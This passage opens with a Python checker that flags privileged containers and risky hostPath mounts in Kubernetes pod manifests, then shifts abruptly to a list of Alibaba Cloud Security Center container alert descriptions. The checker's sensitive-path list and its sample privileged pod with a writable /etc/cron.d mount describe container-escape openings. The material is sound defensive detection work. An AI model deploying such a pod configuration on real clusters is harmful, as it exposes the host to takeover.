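    "/etc/kubernetes/manifests",                    # static pod configuration directory
    "/proc", "/sys",                                # pseudo file systems (core_pattern, cgroup)
)

def _exposes(mount_path, sensitive):
    """True if hostPath mount_path is the sensitive path, a parent of it, or inside it."""
    m, s = posixpath.normpath(mount_path), posixpath.normpath(sensitive)
    return m == s or s.startswith(m + "/") or m.startswith(s + "/")

def check_pod(pod):
    """Return findings for a pod manifest (dict parsed from YAML/JSON); empty list if clean."""
    findings, spec = [], pod.get("spec", {})
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"{c['name']}: runs in privileged mode")
        for vm in c.get("volumeMounts", []):
            hp = host_paths.get(vm["name"])
            if hp is None:
                continue  # not a hostPath volume (emptyDir, configMap, ...)
            if posixpath.normpath(hp) == "/":
                hits = ["host root"]
            else:
                hits = [s for s in SENSITIVE_HOST_PATHS if _exposes(hp, s)]
            if hits:
                mode = "read-only" if vm.get("readOnly") else "writable"
                findings.append(f"{c['name']}: {mode} hostPath {hp} exposes {', '.join(hits)}")
    return findings

SAMPLE_POD = {  # constructed: a "debug" pod that runs privileged and mounts cron.d writable
    "metadata": {"name": "debug"},
    "spec": {"volumes": [{"name": "cron", "hostPath": {"path": "/etc/cron.d"}},
                         {"name": "logs", "hostPath": {"path": "/var/log"}}],
             "containers": [{"name": "shell", "image": "busybox",
                             "securityContext": {"privileged": True},
                             "volumeMounts": [{"name": "cron", "mountPath": "/host-cron"},
                                              {"name": "logs", "mountPath": "/logs", "readOnly": True}]}]},
}
```

`check_pod(SAMPLE_POD)` reports the privileged container and the writable cron.d mount but stays quiet about the read-only /var/log mount, which none of the listed locations cover.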

Proactive Defense for Containers

Alert name

Detection details

Non-image program startup

Security Center detected the startup of a non-image program. This is common when an executable program not included in the original image, such as a backdoor Trojan, is installed while the container is running. There is also a chance that this is a normal business installation requirement. Please handle it promptly.

File defense

File defense.

Non-image program startup blocking

Security Center detected the startup of a non-image program. This is common when an executable program not included in the original image, such as a backdoor Trojan, is installed while the container is running. There is also a chance that this is a normal business installation requirement. Please handle it promptly.

Risk Image Blocking

Alert name

Detection details

Cluster starts a malicious image from the Internet

The cluster started a malicious image from the Internet.

Starting a cluster with unscanned images

The cluster was started without an image scan.

Cluster starts an image with vulnerabilities

The cluster started an image that contains vulnerabilities.

Cluster starts an image with malicious files

The cluster started an image that contains malicious files.

Cluster starts an image that failed a baseline check

The cluster started an image that failed a baseline check.

Cluster starts an image with sensitive files

The cluster started an image that contains sensitive files.

Cluster starts an image with risky build instructions

The cluster started an image that contains risky build instructions.

Trusted Exception

Alert name

Detection overview

System startup component trust event

Detects the trusted status of ECS trusted instances and handles related abnormal statuses. For more information, see Using Trusted Instances.

Other

Alert name

Description

DDoS

DDoS flood attack.

Security Center client is abnormally offline

The detection model found that the main process of the Security Center client, AliYunDun, on your server went offline and did not come back online within a certain period, which triggered an alert. This could be a temporary phenomenon due to network instability, or it could be that the Security Center client was forcibly uninstalled due to a malicious cyberattack. Please log on to the server to confirm whether the Security Center client process is running. If not, please start it promptly.

Security Center client on a non-Alibaba Cloud host is abnormally offline

The detection model found that the main process of the Security Center client, AliYunDun, on your server went offline and did not come back online within a certain period, which triggered an alert. This could be a temporary phenomenon due to network instability, or it could be that the Security Center client was forcibly uninstalled due to a malicious cyberattack. Please log on to the server to confirm whether the Security Center client process is running. If not, please start it promptly.